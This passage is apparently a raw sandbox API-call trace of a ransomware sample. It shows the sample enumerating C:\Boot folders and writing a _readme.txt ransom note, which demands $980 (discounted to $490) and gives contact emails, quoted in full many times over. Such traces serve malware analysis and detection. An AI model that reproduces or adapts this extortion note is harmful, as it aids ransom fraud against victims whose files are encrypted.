lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 1113 [0173.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x326560 [0173.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad8198 | out: hHeap=0x2c0000) returned 1 [0173.716] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned 1112 [0173.716] WriteFile (in: hFile=0x690, lpBuffer=0x326560*, nNumberOfBytesToWrite=0x458, lpNumberOfBytesWritten=0xa13fb64, lpOverlapped=0x0 | out: lpBuffer=0x326560*, lpNumberOfBytesWritten=0xa13fb64*=0x458, lpOverlapped=0x0) returned 1 [0173.717] CloseHandle (hObject=0x690) returned 1 [0173.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8db78 | out: hHeap=0x2c0000) returned 1 [0173.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad0490 | out: hHeap=0x2c0000) returned 1 [0173.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.717] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e54b620, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e54b620, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.717] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e54b620, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e54b620, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.717] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0173.717] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e54b620, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e54b620, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e54b620, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0173.717] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e54b620, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e54b620, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e54b620, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0173.717] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59df8 | out: hHeap=0x2c0000) returned 1 [0173.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59df8 [0173.718] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x326560 [0173.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8d2f0 [0173.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.720] PathFindFileNameW (pszPath="C:\\Boot\\ja-JP\\") returned="ja-JP\\" [0173.720] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0173.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.720] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.720] PathFindFileNameW (pszPath="") returned="" [0173.720] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0173.720] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0173.721] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3aa2818 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0173.721] FreeLibrary (hLibModule=0x759d0000) returned 1 [0173.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59a88 | out: hHeap=0x2c0000) returned 1 [0173.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.721] PathAppendW (in: pszPath="C:\\Boot\\ja-JP\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 1 [0173.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.721] PathFileExistsW (pszPath="C:\\Boot\\ja-JP\\_readme.txt") returned 0 [0173.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3ad0490 [0173.721] lstrcpyW (in: lpString1=0x3ad0490, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0173.721] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0173.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8db78 [0173.721] CreateFileW (lpFileName="C:\\Boot\\ja-JP\\_readme.txt" (normalized: "c:\\boot\\ja-jp\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x690 [0173.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x3ad8198 [0173.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x858) returned 0x3aa2818 [0173.722] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3aa2818, cbMultiByte=2136, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 1113 [0173.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x326560 [0173.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad8198 | out: hHeap=0x2c0000) returned 1 [0173.722] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned 1112 [0173.722] WriteFile (in: hFile=0x690, lpBuffer=0x326560*, nNumberOfBytesToWrite=0x458, lpNumberOfBytesWritten=0xa13fb64, lpOverlapped=0x0 | out: lpBuffer=0x326560*, lpNumberOfBytesWritten=0xa13fb64*=0x458, lpOverlapped=0x0) returned 1 [0173.723] CloseHandle (hObject=0x690) returned 1 [0173.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8db78 | out: hHeap=0x2c0000) returned 1 [0173.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad0490 | out: hHeap=0x2c0000) returned 1 [0173.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.723] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e54b620, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e54b620, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.723] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e54b620, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e54b620, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.724] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, 